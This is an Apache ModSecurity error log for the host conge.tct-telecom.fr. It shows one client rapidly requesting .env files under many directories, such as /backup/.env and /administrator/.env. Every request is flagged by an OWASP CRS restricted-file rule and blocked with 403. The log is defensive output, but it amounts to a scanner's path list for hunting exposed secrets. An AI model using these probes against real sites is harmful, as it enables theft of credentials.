[Mon May 11 15:50:16.245000 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /angular/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/angular/.env"] [unique_id "agHemKt2WtvoFr7xvGzc2AAAAIk"]
[Mon May 11 15:50:16.245408 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/angular/.env"] [unique_id "agHemKt2WtvoFr7xvGzc2AAAAIk"]
[Mon May 11 15:50:16.245601 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/angular/.env"] [unique_id "agHemKt2WtvoFr7xvGzc2AAAAIk"]
[Mon May 11 15:50:16.337117 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /svelte/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/svelte/.env"] [unique_id "agHemKt2WtvoFr7xvGzc2QAAAIk"]
[Mon May 11 15:50:16.337596 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/svelte/.env"] [unique_id "agHemKt2WtvoFr7xvGzc2QAAAIk"]
[Mon May 11 15:50:16.337815 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/svelte/.env"] [unique_id "agHemKt2WtvoFr7xvGzc2QAAAIk"]
[Mon May 11 15:50:16.429058 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vite/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/vite/.env"] [unique_id "agHemKt2WtvoFr7xvGzc2gAAAIk"]
[Mon May 11 15:50:16.429448 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/vite/.env"] [unique_id "agHemKt2WtvoFr7xvGzc2gAAAIk"]
[Mon May 11 15:50:16.429632 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/vite/.env"] [unique_id "agHemKt2WtvoFr7xvGzc2gAAAIk"]
[Mon May 11 15:50:16.521735 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backup/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/backup/.env"] [unique_id "agHemKt2WtvoFr7xvGzc2wAAAIk"]
[Mon May 11 15:50:16.522248 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/backup/.env"] [unique_id "agHemKt2WtvoFr7xvGzc2wAAAIk"]
[Mon May 11 15:50:16.522488 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/backup/.env"] [unique_id "agHemKt2WtvoFr7xvGzc2wAAAIk"]
[Mon May 11 15:50:16.614265 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backups/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/backups/.env"] [unique_id "agHemKt2WtvoFr7xvGzc3QAAAIk"]
[Mon May 11 15:50:16.614648 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/backups/.env"] [unique_id "agHemKt2WtvoFr7xvGzc3QAAAIk"]
[Mon May 11 15:50:16.614836 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/backups/.env"] [unique_id "agHemKt2WtvoFr7xvGzc3QAAAIk"]
[Mon May 11 15:50:16.707346 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /old/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/old/.env"] [unique_id "agHemKt2WtvoFr7xvGzc3gAAAIk"]
[Mon May 11 15:50:16.707820 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/old/.env"] [unique_id "agHemKt2WtvoFr7xvGzc3gAAAIk"]
[Mon May 11 15:50:16.708054 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/old/.env"] [unique_id "agHemKt2WtvoFr7xvGzc3gAAAIk"]
[Mon May 11 15:50:16.801312 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tmp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/tmp/.env"] [unique_id "agHemKt2WtvoFr7xvGzc3wAAAIk"]
[Mon May 11 15:50:16.801789 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/tmp/.env"] [unique_id "agHemKt2WtvoFr7xvGzc3wAAAIk"]
[Mon May 11 15:50:16.802022 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/tmp/.env"] [unique_id "agHemKt2WtvoFr7xvGzc3wAAAIk"]
[Mon May 11 15:50:16.895198 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /temp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/temp/.env"] [unique_id "agHemKt2WtvoFr7xvGzc4AAAAIk"]
[Mon May 11 15:50:16.895610 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/temp/.env"] [unique_id "agHemKt2WtvoFr7xvGzc4AAAAIk"]
[Mon May 11 15:50:16.895803 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/temp/.env"] [unique_id "agHemKt2WtvoFr7xvGzc4AAAAIk"]
[Mon May 11 15:50:16.987331 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/lab/.env"] [unique_id "agHemKt2WtvoFr7xvGzc4QAAAIk"]
[Mon May 11 15:50:16.987725 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/lab/.env"] [unique_id "agHemKt2WtvoFr7xvGzc4QAAAIk"]
[Mon May 11 15:50:16.987923 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/lab/.env"] [unique_id "agHemKt2WtvoFr7xvGzc4QAAAIk"]
[Mon May 11 15:50:17.080254 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cronlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/cronlab/.env"] [unique_id "agHemat2WtvoFr7xvGzc4gAAAIk"]
[Mon May 11 15:50:17.080725 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/cronlab/.env"] [unique_id "agHemat2WtvoFr7xvGzc4gAAAIk"]
[Mon May 11 15:50:17.080996 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/cronlab/.env"] [unique_id "agHemat2WtvoFr7xvGzc4gAAAIk"]
[Mon May 11 15:50:17.173499 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/cron/.env"] [unique_id "agHemat2WtvoFr7xvGzc4wAAAIk"]
[Mon May 11 15:50:17.173985 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/cron/.env"] [unique_id "agHemat2WtvoFr7xvGzc4wAAAIk"]
[Mon May 11 15:50:17.174217 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/cron/.env"] [unique_id "agHemat2WtvoFr7xvGzc4wAAAIk"]
[Mon May 11 15:50:17.266655 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /en/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/en/.env"] [unique_id "agHemat2WtvoFr7xvGzc5AAAAIk"]
[Mon May 11 15:50:17.267105 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/en/.env"] [unique_id "agHemat2WtvoFr7xvGzc5AAAAIk"]
[Mon May 11 15:50:17.267331 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/en/.env"] [unique_id "agHemat2WtvoFr7xvGzc5AAAAIk"]
[Mon May 11 15:50:17.360140 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /administrator/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/administrator/.env"] [unique_id "agHemat2WtvoFr7xvGzc5QAAAIk"]
[Mon May 11 15:50:17.360635 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/administrator/.env"] [unique_id "agHemat2WtvoFr7xvGzc5QAAAIk"]
[Mon May 11 15:50:17.360871 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/administrator/.env"] [unique_id "agHemat2WtvoFr7xvGzc5QAAAIk"]
